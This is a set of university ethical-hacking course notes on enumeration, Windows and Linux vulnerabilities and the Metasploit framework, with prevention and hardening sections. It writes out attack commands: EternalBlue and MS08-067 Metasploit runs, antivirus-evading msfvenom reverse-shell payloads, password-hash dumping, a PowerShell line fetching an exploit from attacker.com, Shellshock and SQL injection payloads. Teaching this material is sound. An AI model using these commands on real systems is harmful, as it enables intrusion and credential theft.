COURSE CODE COURSE TITLE L T P C

10212CS225 Ethical Hacking 3 0 2 4

UNIT – 3 Enumeration and System Hacking L-9 Hours

Introduction to Enumeration – DNS Zone Transfers – NetBIOS Enumeration Tools- Windows and
Linux Operating System Vulnerabilities – Metasploit framework- System Hacking – Malware
Creation – Evading IDS, Firewall and Honeypot - Maintaining Access and Clearing Tracks

1. Introduction to Enumeration
Enumeration is the process of extracting valuable information from a target system or
network. Different enumeration techniques are used depending on the type of system and the
required information. Let’s explore the main types of enumeration with real-world examples.

Types of Enumeration with Examples

i. NetBIOS Enumeration
What is NetBIOS Enumeration?
NetBIOS (Network Basic Input/Output System) allows computers to communicate and share files
over a local network. NetBIOS enumeration is used to gather information about shared resources,
machine names, and services on a Windows network.

Real-Time Example: Company File Server Access

Scenario:
A company has a file-sharing system on its internal Windows network. An ethical hacker or
administrator wants to check what network shares and devices are available.

How to Perform NetBIOS Enumeration?

Using the nbtstat command in Windows:

nbtstat -A 192.168.1.10

Expected Output:

NetBIOS Name Table

---------------------------------
Name Type Status
---------------------------------
SERVER01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
SHARED_DOCS <20> UNIQUE Registered

Result: The attacker or administrator discovers that "SHARED_DOCS" is an available file share,
which could be accessed for further testing or security auditing.
ii. SNMP Enumeration
What is SNMP Enumeration?
Simple Network Management Protocol (SNMP) is used for monitoring and managing network
devices (e.g., routers, switches, printers). If misconfigured, attackers can extract system details,
running processes, or even modify configurations.

Real-Time Example: Router Configuration Leak

Scenario:
A network administrator wants to check device information on a corporate router. However, an
attacker could also exploit weak SNMP settings to retrieve sensitive details.

How to Perform SNMP Enumeration?

Using the snmpwalk tool:

snmpwalk -v2c -c public 192.168.1.1

Expected Output:

sysDescr.0 = STRING: Cisco Router Model X

sysUpTime.0 = Timeticks: 23456789
sysContact.0 = STRING: [email protected]
sysLocation.0 = STRING: Server Room

Result: The attacker now knows the router model, admin contact, and location, which could be
used in social engineering or further attacks.

Prevention: Change default SNMP community strings and restrict SNMP access.

iii. LDAP Enumeration

What is LDAP Enumeration?
LDAP (Lightweight Directory Access Protocol) is used for accessing user directories in
enterprise networks (e.g., Active Directory). Attackers can query LDAP to gather user details,
email addresses, and group memberships.

Real-Time Example: Employee Directory Exposure

Scenario:
An attacker targets a company using Microsoft Active Directory to extract a list of employees.

How to Perform LDAP Enumeration?

Using ldapsearch in Linux:

ldapsearch -x -h ldap.company.com -b "dc=company,dc=com"

Expected Output:

dn: cn=John Doe,ou=Employees,dc=company,dc=com

mail: [email protected]
title: Senior Engineer

Result: The attacker now has employee names, emails, and job roles, which can be used for
phishing or brute-force attacks.

Prevention: Restrict anonymous LDAP queries and enforce strong authentication.

iv. NTP Enumeration

What is NTP Enumeration?
Network Time Protocol (NTP) is used to synchronize system clocks across a network. Attackers
can query NTP servers to gather a list of connected clients, system uptime, or exploit
vulnerabilities.

Real-Time Example: DDoS Attack via NTP Amplification

Scenario:
An attacker looks for misconfigured NTP servers that respond to the "monlist" command, which
provides a list of recent clients. This data can be used to launch NTP amplification attacks.

How to Perform NTP Enumeration?

Using ntpq command:

ntpq -c monlist 192.168.1.1

Expected Output:

remote address local address count

-------------------------------------------------
192.168.1.10 192.168.1.1 300
192.168.1.20 192.168.1.1 200

Result: The attacker now knows which devices are syncing with the NTP server and can exploit
them for further attacks.

Prevention: Disable the "monlist" command in NTP configuration.

1.3. NetBIOS Enumeration Tools
i. Netstat (Network Statistics)

� What is Netstat?
Netstat is a command-line tool used to view network connections, active ports, and NetBIOS
statistics. It helps in diagnosing network issues, monitoring TCP/IP activity, and resolving
NetBIOS name conflicts.

� Real-Time Example: Using netstat for NetBIOS Enumeration

Let’s assume you suspect an unknown system is accessing shared files on your network. You want
to check NetBIOS connections to see active file-sharing sessions.

Step 1: Open Command Prompt

Press Win + R, type cmd, and hit Enter.

Step 2: Run netstat to View Active Connections

netstat -an

Expected Output:

Proto Local Address Foreign Address State

TCP 192.168.1.5:139 192.168.1.10:5678 ESTABLISHED
TCP 192.168.1.5:445 192.168.1.12:4356 ESTABLISHED

Explanation:

 Port 139 (NetBIOS Session Service) → Indicates a shared file access session.
 Port 445 (SMB - Server Message Block) → Windows file sharing over the network.
 The foreign IPs (192.168.1.10, 192.168.1.12) represent systems accessing shared files.

Step 3: Check NetBIOS Name Table

netstat -n

Output Example:

Active Connections
Proto Local Address Foreign Address State
TCP 192.168.1.5:139 192.168.1.20:1234 ESTABLISHED

If you see a suspicious connection, you can use:

nbtstat -A 192.168.1.20

� This will reveal the NetBIOS name and shared resources of the remote device.
 ii. Hyena (GUI-Based Windows Management & Enumeration)

What is Hyena?
Hyena is a Windows system management tool that provides a graphical interface for managing
Active Directory, shared resources, users, groups, and network sessions.

Real-Time Example: Using Hyena for NetBIOS Enumeration

Imagine you’re an IT administrator and want to check who is accessing shared files on your
Windows server.

Step 1: Download & Install Hyena

 Download Hyena from SystemTools.com

 Install and launch the application.

Step 2: Open Hyena & Connect to Active Directory

 Open Hyena and expand "Windows Network".

 Select the target domain (company.local).
 Click on "Computers" to see all devices in the network.

Step 3: View Active File Shares

 Expand "Shares" to list all shared folders.

 Click on a shared folder to view who is accessing it.

Expected Output in Hyena UI:

Shared Folder: \\SERVER01\SHARE

User: JohnDoe
Status: Active Session

Now you know that "JohnDoe" is accessing "SHARE" on SERVER01.

Step 4: Check Group Memberships

 Click Users → Select a user → View Group Member Matrix.

Example Output:

User: JohnDoe
Group: IT Admins
Nested Group: Domain Users

This helps identify unauthorized group memberships.

Hyena also lets you:

✔ View open files and forcefully close unwanted sessions.
✔ Modify group policies and user permissions.
iii. PsExec (Remote Command Execution Tool)

What is PsExec?
PsExec is a command-line tool that allows you to run commands on remote Windows
computers without physically accessing them.

Real-Time Example: Using PsExec for Remote Enumeration

Assume you are an administrator and need to check the IP configuration of a remote system
(192.168.1.20).

Step 1: Download PsExec

1. Download PsExec from Microsoft Sysinternals:

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
2. Extract PsExec.exe to C:\Windows\System32.

Step 2: Open Command Prompt as Administrator

Press Win + R, type cmd, and hit Ctrl + Shift + Enter.

Step 3: Run PsExec to Execute Remote Commands

psexec \\192.168.1.20 -u Administrator -p password cmd

Output:

Microsoft Windows [Version 10.0.19044.1288]

C:\Windows\system32>

Now you have a remote command shell on the target system!

Step 4: Run IP Configuration on the Remote Machine

ipconfig /all

Output Example:

Ethernet adapter Ethernet:

Connection-specific DNS Suffix . : example.com
IPv4 Address. . . . . . . . . . . : 192.168.1.20
Default Gateway . . . . . . . . . : 192.168.1.1

You successfully retrieved network information from a remote PC!

Other Useful PsExec Commands:

 Check Running Processes on Remote PC:

psexec \\192.168.1.20 tasklist

  Shut Down Remote Computer:

psexec \\192.168.1.20 shutdown /s /t 0

1.4. Windows and Linux Operating System Vulnerabilities

Operating systems (OS) are a key target for cybercriminals due to their widespread use.
Both Windows and Linux have vulnerabilities that attackers exploit to gain unauthorized access,
execute malicious code, or disrupt system functionality.

I. Windows OS Vulnerabilities
Windows, being one of the most commonly used operating systems, is frequently targeted by
attackers. Some of the key vulnerabilities include:

i. Buffer Overflows

What is it?
A buffer overflow occurs when a program writes more data to a memory buffer than it can
hold, causing data corruption or code execution. This allows attackers to inject malicious code
and take control of the system.

Real-Time Example: Microsoft’s Windows SMB Vulnerability (MS08-067)

Scenario:

 Microsoft’s Server Message Block (SMB) service had a buffer overflow vulnerability in Windows
XP, Windows Server 2003.
 Attackers exploited this bug to remotely execute malware on unpatched systems.
 The Conficker worm used this vulnerability to spread across millions of computers.

How to Exploit It? (Penetration Testing Example)

1. Open Metasploit and run:

use exploit/windows/smb/ms08_067_netapi

2. Set the target IP and exploit:

set RHOSTS 192.168.1.10

exploit

Effect: If the system is vulnerable, the attacker gains a remote shell, allowing them to execute
commands.

Prevention:
Keep Windows updated with security patches.
Disable SMBv1 (Older versions of SMB are vulnerable).
 ii. Remote Code Execution (RCE)

What is it?
RCE vulnerabilities allow attackers to execute commands remotely on a Windows system. This
is often exploited in unpatched software, web applications, or network services.

Real-Time Example: EternalBlue & WannaCry Ransomware (MS17-010)

Scenario:

 In 2017, the EternalBlue exploit (NSA-developed) was leaked by hackers.

 Attackers used it to spread WannaCry ransomware across unpatched Windows machines.
 The attack encrypted files and demanded a Bitcoin ransom.

How to Exploit It?

1. Run Nmap to detect vulnerable systems:

nmap -p 445 --script smb-vuln-ms17-010 192.168.1.0/24

2. Exploit using Metasploit:

use exploit/windows/smb/ms17_010_eternalblue

Effect: Attackers gain full control of the system and can install malware.

Prevention:
Always update Windows and apply patches.
Disable unnecessary services like SMB.
Use a firewall to block untrusted connections.

iii. Privilege Escalation

What is it?
Privilege escalation occurs when an attacker gains higher-level permissions (Administrator or
SYSTEM access) by exploiting OS vulnerabilities.

Real-Time Example: PrintNightmare Vulnerability (CVE-2021-34527)

Scenario:

 The Windows Print Spooler service had a flaw that allowed attackers to gain SYSTEM privileges.
 Attackers could install programs, modify data, and create new accounts with full rights.
 This was widely exploited in corporate networks.

How to Exploit It?

1. Open PowerShell and execute:

Invoke-WebRequest -Uri http://attacker.com/exploit.ps1 -OutFile

exploit.ps1
 2. Run the exploit:

powershell
CopyEdit
powershell -ExecutionPolicy Bypass -File exploit.ps1

Effect: The attacker gets full control over the system.

Prevention:
Disable Print Spooler if not needed:

Stop-Service -Name Spooler -Force

� Restrict user privileges and use endpoint security tools.

iv. Zero-Day Exploits

What is it?
Zero-day vulnerabilities are security flaws discovered by hackers before the vendor releases a
patch. These are highly dangerous because there is no immediate fix.

Real-Time Example: Windows Win32k Zero-Day Exploit (CVE-2023-28252)

Scenario:

 A privilege escalation flaw in the Win32k driver allowed attackers to execute arbitrary code.
 Used by ransomware groups to take control of Windows machines.
 Microsoft released a patch, but many unpatched systems remained vulnerable.

Prevention:
Enable automatic updates.
Use an intrusion detection system (IDS).
Implement application whitelisting to prevent unknown executables.
II. Linux OS Vulnerabilities
Linux is widely used in servers, cloud computing, and enterprise environments due to its
stability and security. However, Linux is not invulnerable—hackers can exploit vulnerabilities
to gain unauthorized access, execute malicious code, or disrupt services.

Below are the key Linux OS vulnerabilities, each explained separately with real-time examples.

i. Kernel Vulnerabilities
What is it?

The Linux kernel is the core of the operating system. A kernel vulnerability can allow attackers
to gain root access or execute arbitrary code at the highest privilege level.

Real-Time Example: Dirty COW (CVE-2016-5195)

Scenario:

 A vulnerability in the Linux kernel’s copy-on-write (COW) mechanism allowed any user to gain
root access.
 Attackers could modify read-only files and overwrite system binaries.
 This was exploited in the wild, affecting servers and cloud systems.

Exploitation Demonstration

1. Check Kernel Version:

uname -r

If the version is before 4.8, the system is vulnerable.

2. Run the Dirty COW exploit (for educational purposes only):

gcc dirtycow.c -o exploit

./exploit

The attacker gains root privileges and can execute any command.

Prevention:

Update the Linux kernel regularly:

sudo apt update && sudo apt upgrade -y

Use SELinux or AppArmor to restrict privilege escalation.

ii. Privilege Escalation
What is it?

Privilege escalation occurs when a low-privileged user exploits vulnerabilities to gain root
access.

Real-Time Example: Sudo Vulnerability (CVE-2021-3156)

Scenario:

 A bug in the sudo command allowed any user to become root.

 Attackers exploited this to modify system files and create new root accounts.

Exploitation Demonstration

1. Check if sudo is vulnerable:

sudoedit -s /

If an error like "malloc(): corrupted top size" appears, the system is vulnerable.

2. Exploit the vulnerability (for testing only):

./sudo_exploit

The attacker gains root privileges without a password.

Prevention:

Update sudo to the latest version:

sudo apt update && sudo apt upgrade sudo -y

Disable unnecessary sudo permissions for users.

iii. Remote Code Execution (RCE)

What is it?

An RCE vulnerability allows attackers to run malicious code remotely on a Linux system. This
can happen due to weak SSH, vulnerable services, or exposed APIs.

Real-Time Example: Shellshock Bug (CVE-2014-6271)

Scenario:

 A vulnerability in Bash allowed attackers to execute arbitrary commands remotely.

  Affected web servers, routers, and IoT devices running Bash.

Exploitation Demonstration

1. Check if Bash is vulnerable:

env x='() { :;}; echo Vulnerable' bash -c "echo Testing"

If the output includes "Vulnerable", the system is exploitable.

2. Attack using an HTTP request:

curl -H "User-Agent: () { :;}; /bin/bash -c 'id'" http://target.com/cgi-

bin/vulnerable.cgi

The attacker gains remote access to the server.

Prevention:

Update Bash to a patched version.

sudo apt update && sudo apt upgrade bash -y

Disable unnecessary CGI scripts in web servers.

iv. Web Application Vulnerabilities

What is it?

Many Linux servers host web applications (Apache, Nginx, PHP). Web applications can be
vulnerable to:

 SQL Injection (SQLi) – Attackers inject malicious SQL queries.

 Cross-Site Scripting (XSS) – Attackers inject JavaScript into web pages.

Real-Time Example: SQL Injection on Linux Server

Scenario:

 A vulnerable web page uses MySQL without input validation.

 Attackers can extract sensitive data from the database.

Exploitation Demonstration

1. Find a vulnerable login form:

Username: ' OR 1=1 --

Password: (anything)

This bypasses authentication and logs in as admin.

 2. Extract all user credentials:

' UNION SELECT username, password FROM users --

The attacker steals all database records.

Prevention:

Use prepared statements to prevent SQL injection.

Install a Web Application Firewall (WAF) like ModSecurity.

v. Package Vulnerabilities
What is it?

Linux systems rely on third-party software (Apache, OpenSSH, Python). If these packages
contain security flaws, attackers can exploit them.

Real-Time Example: OpenSSL Heartbleed (CVE-2014-0160)

Scenario:

 A flaw in OpenSSL’s Heartbeat extension leaked sensitive memory data (including passwords &
encryption keys).
 Attackers stole SSL certificates from major websites.

Exploitation Demonstration

1. Check OpenSSL version:

openssl version -a

If the version is before 1.0.1g, it is vulnerable.

2. Exploit the vulnerability:

python heartbleed_exploit.py target.com

Attackers extract sensitive server data.

Prevention:

Update OpenSSL immediately:

sudo apt update && sudo apt upgrade openssl -y

Use TLS 1.2+ instead of outdated SSL versions.

vi. Misconfigurations
What is it?

Weak security settings make Linux systems vulnerable. Common misconfigurations include:

 Weak passwords (admin:admin).

 Exposed services (FTP, Telnet, RDP).
 Incorrect file permissions (chmod 777).

Real-Time Example: Weak SSH Configuration

Scenario:

 A company exposes SSH to the internet without strong authentication.

 Attackers perform brute-force login and access the system.

Exploitation Demonstration

1. Scan for open SSH ports:

nmap -p 22 --script ssh-brute 192.168.1.10

✅ If SSH is misconfigured, attackers gain access using default credentials.

Prevention:

Disable root login in SSH:

sudo nano /etc/ssh/sshd_config

PermitRootLogin no

� Enforce key-based authentication instead of passwords.

vii. Zero-Day Exploits

What is it?

A zero-day exploit is an unknown vulnerability that has no fix. Attackers use these flaws to
target Linux systems before patches are released.

Real-Time Example: Linux Polkit Vulnerability (CVE-2021-4034)

Scenario:

 A vulnerability in Polkit (pkexec) allowed root access on Linux systems.

 Attackers exploited this before a patch was released.
Prevention:

Apply security updates as soon as patches are available.

Use intrusion detection systems (IDS).

1.5 Metasploit Framework

Introduction
Metasploit is a penetration testing framework used for developing and executing exploit
code against remote target machines. It is widely used in cybersecurity for vulnerability
assessment, ethical hacking, and security testing. The framework provides a vast library of
exploits, payloads, auxiliary tools, and post-exploitation modules, making it an essential tool for
both offensive and defensive security professionals.

Modules of Metasploit Framework

Metasploit is structured into different modules, each serving a specific purpose in penetration
testing:

1. Exploits

 An exploit is a piece of code designed to take advantage of security vulnerabilities in a target

system.
 Metasploit contains a large database of exploits that can be used against operating systems,
applications, and services.
 Example: MS17-010 EternalBlue exploit, which targets a Windows SMB vulnerability.

2. Payloads

 A payload is the code that gets executed on the target system after a successful exploit.
 Types of payloads:
o Reverse Shell – The compromised machine connects back to the attacker’s machine.
o Bind Shell – The attacker connects to a shell on the compromised machine.
o Meterpreter – An advanced, interactive payload that provides deep system access.
 Example: windows/meterpreter/reverse_tcp

3. Auxiliary Modules

 Non-exploit modules used for scanning, enumeration, fuzzing, and brute-force attacks.
 Used to gather information about a target before launching an attack.
 Example: scanner/ftp/ftp_login for brute-forcing FTP credentials.

4. Encoders

 Encoders help in bypassing antivirus and security mechanisms by obfuscating payloads.

  Example: shikata_ga_nai – A popular encoder for hiding malicious payloads.

5. Post-Exploitation Modules

 Used after a successful exploitation to perform advanced attacks such as privilege escalation,
data extraction, and maintaining persistence.
 Example: windows/gather/enum_logged_on_users – Retrieves a list of logged-in users.

6. NOP Generators (No Operation)

 Used to prevent Intrusion Detection Systems (IDS) from detecting malicious payloads.
 Helps in buffer overflow attacks by adding non-operational instructions.

Components of Metasploit Framework

Metasploit consists of various tools and interfaces that help users interact with the framework
efficiently.

1. Msfconsole

 The most powerful and flexible command-line interface of Metasploit.

 Allows users to search, configure, and execute exploits and payloads.
 Commands:

msfconsole
search smb
use exploit/windows/smb/ms17_010_eternalblue

2. Msfvenom

 A tool used to generate and encode payloads.

 Combines msfpayload and msfencode into one tool.
 Example: Generate a reverse shell payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-IP>

LPORT=4444 -f exe > payload.exe

3. Armitage

 A Graphical User Interface (GUI) for Metasploit.

 Helps in visualizing attacks, automating exploits, and collaborating with teams.
Metasploit Architecture
Metasploit is built on a modular architecture, making it easy to develop and use exploits. The
key components include:

1. Exploit Modules – The actual attack code that targets a system vulnerability. Exploits are used to
gain access to a system by targeting security vulnerabilities. Once the exploit is executed
successfully, attackers try to escalate privileges to gain superuser (root) access.

Types of Exploits

Exploit Type Description

Remote
Works over a network and exploits vulnerabilities without prior access to the system.
Exploit

Requires prior access to the system and is used to escalate privileges (e.g., from user
Local Exploit
to root).

Example of a Remote Exploit (Windows SMB Exploit)

1. Open Metasploit:

msfconsole

2. Select an exploit (MS08-067):

use exploit/windows/smb/ms08_067_netapi

3. Set the target system:

set RHOSTS 192.168.1.10

set PAYLOAD windows/meterpreter/reverse_tcp

4. Launch the attack:

exploit

If successful, the attacker gains a remote shell on the target machine.

 2. Payload Modules – Malicious code that runs after a successful exploit. The payload is the
malicious code that executes after a successful exploit. Payloads can perform actions like deleting
files, sending spam, encrypting data, or providing a remote connection.

Types of Payloads

Payload
Description
Type
Self-contained payloads that perform a single task (e.g., adding a user, running
Singles
an executable).
Stagers Small programs that download and execute the main payload in memory.
The final payload that executes malicious activities after being delivered by a
Stages
stager.

Example of Creating a Payload Using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f
exe > payload.exe

This creates an executable payload that, when run on the target system, opens a Meterpreter
session for remote control.

3 Auxiliary Modules
Auxiliary modules do not exploit vulnerabilities but are used for scanning, enumeration, and
other security-related tasks.

Features of Auxiliary Modules

 Scanning for vulnerabilities

 Sniffing network traffic
 Brute-force attacks
 Gathering target system information

Example: Scanning for Open SMB Shares

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

This scans the network for SMB services and lists their versions.
4 Encoders in Metasploit
Encoders modify payloads to help them bypass antivirus and intrusion detection systems
(IDS).

Features of Encoders

 Obfuscate the exploit payload

 Avoid detection by security software
 Increase the chance of a successful attack

Example: Encoding a Payload to Evade Antivirus

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -e
x86/shikata_ga_nai -f exe > encoded_payload.exe

The "shikata_ga_nai" encoder modifies the payload to make it harder for antivirus software to
detect.

5️ Post-Exploitation Modules
Post-exploitation modules help maintain access, gather system information, and perform
additional attacks after a system is compromised.

Features of Post-Exploitation Modules

 Dumping passwords
 Capturing keystrokes
 Extracting user credentials
 Escalating privileges

Example: Dumping Windows Password Hashes

use post/windows/gather/hashdump
run

This extracts password hashes from a compromised Windows system.

6 NOPs (No Operation Instructions) in Metasploit

NOPs are machine code instructions that do nothing but help exploit execution by aligning
shellcode at a predictable memory address.

Features of NOPs

 Prevent memory corruption issues

  Ensure stable shellcode execution
 Bypass Address Space Layout Randomization (ASLR)

Example: Generating a NOP Sled with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp -f raw | msfvenom -a x86 --
platform windows -e x86/nops -b '\x00'

This generates a NOP sled to increase the reliability of an exploit.

Example: Exploiting Windows 7 using Metasploit
(EternalBlue)
Step 1: Start Metasploit
msfconsole

Step 2: Select the Exploit

use exploit/windows/smb/ms17_010_eternalblue

Step 3: Set Target IP and Payload

set RHOSTS <Target-IP>
set payload windows/meterpreter/reverse_tcp
set LHOST <Attacker-IP>
set LPORT 4444

Step 4: Launch the Attack

exploit

Step 5: Perform Post-Exploitation

sysinfo # Get system information
getuid # Get current user privileges
hashdump # Extract password hashes

Applications of Metasploit Framework

1. Penetration Testing – Helps security professionals find and exploit vulnerabilities.
2. Red Team Operations – Simulates real-world attacks to test defenses.
3. Malware Research – Assists researchers in analyzing malicious code.
4. Security Awareness Training – Used in ethical hacking courses.
5. Automated Security Audits – Scans networks and applications for security flaws.

Defensive Measures Against Metasploit Attacks

1. Regular Software Updates – Patch known vulnerabilities.
2. Firewall & IDS/IPS – Block unauthorized connections and detect suspicious activity.
3. Disable SMBv1 – Prevents EternalBlue-style attacks.
4. Use Strong Authentication – Protects against brute-force attacks.
5. Monitor Network Traffic – Identifies unusual outbound connections.
Demonstration of Windows and Linux OS Hardening

Operating System (OS) hardening is the process of securing a system by reducing its
vulnerabilities. It involves modifying default configurations, removing unnecessary programs or
services, applying updates, and implementing security features to ensure that the system is less
prone to attacks. This process plays a vital role in protecting both Windows and Linux systems
from various threats including malware, unauthorized access, and system exploitation.

In Windows OS, hardening begins with keeping the system up to date. Applying regular
Windows updates and installing security patches helps fix known vulnerabilities. Enabling
Windows Defender provides real-time protection against viruses, spyware, and other malware.
Along with this, Windows Firewall should be configured to restrict unauthorized access by
defining inbound and outbound rules based on specific needs.

Another critical aspect of Windows hardening is managing user privileges. Enforcing User
Account Control (UAC) ensures that administrative privileges are granted only when necessary.
The use of strong and complex passwords, account lockout policies after multiple failed login
attempts, and disabling default administrative accounts add extra layers of security. Group Policy
Editor (gpedit.msc) can be used to enforce system-wide security policies, such as password
expiration, USB access control, and software restriction.

System services and features that are not in use should be disabled using services.msc to
minimize attack surfaces. Audit policies and security logs should be enabled through the Event
Viewer to monitor suspicious activities. Moreover, enabling BitLocker ensures that sensitive data
on the hard drive is encrypted, preventing unauthorized access if the device is stolen or
compromised.
 In Linux OS, hardening starts with regular updates and upgrades. The use of package
managers like apt or yum ensures the installation of the latest security patches. Unnecessary
services should be disabled using system management tools like systemctl. For example, disabling
services such as Bluetooth, Telnet, or FTP, if they are not required, helps reduce potential entry
points for attackers.

Secure SSH configuration is another important step in Linux hardening. This includes
changing the default SSH port, disabling root login via SSH, and restricting access to specific
users. Configuration files like /etc/ssh/sshd_config can be edited to apply these settings. Setting
correct file permissions using commands like chmod, chown, and defining appropriate umask
values ensures that users cannot access or modify files they don’t own.
 Linux systems should also employ firewall rules using tools such as UFW (Uncomplicated
Firewall) or iptables. These firewalls help control incoming and outgoing network traffic.
Additionally, security tools like Fail2Ban help monitor login attempts and block IPs that show
malicious behavior, while ClamAV can be used for antivirus scanning.

User management is also critical in Linux. Unused users and groups should be deleted, and
the principle of least privilege must be followed. Logs located in /var/log/ directories should be
monitored regularly to detect anomalies. Tools such as auditd, chkrootkit, and logwatch can help
in monitoring and intrusion detection.

In conclusion, both Windows and Linux OS hardening aim to protect systems from
unauthorized access, data breaches, and malware attacks. The key practices include applying
updates, managing users and permissions, configuring firewalls, disabling unused services, and
monitoring system activities. Regularly reviewing security settings and adapting to new threats is
essential in maintaining a secure and robust operating environment.